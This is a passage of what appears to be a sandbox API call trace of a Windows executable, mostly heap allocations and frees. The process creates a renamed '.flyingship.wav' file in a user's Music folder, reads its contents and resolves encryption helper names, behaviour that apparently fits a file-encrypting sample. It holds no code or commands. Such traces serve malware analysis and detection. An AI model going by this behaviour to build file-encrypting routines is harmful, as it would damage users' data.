Flags=0x0, Size=0x10) returned 0x9b9fa0 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.903] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol")) returned 0x10 [0187.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0187.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0187.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\tcz4fpeq.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0187.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0187.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0187.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0187.907] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.908] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0187.912] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8df5, lpOverlapped=0x0) returned 1 [0187.912] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18df5) returned 0xbea018 [0187.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18df5) returned 0xa5f008 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18df5) returned 0xbea018 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.918] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.918] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18df5) returned 0xbea018 [0187.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0187.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0187.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0187.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18df5) returned 0xa77e08 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0187.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.922] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.922] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0187.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0187.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0187.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.923] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0187.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.923] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.924] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 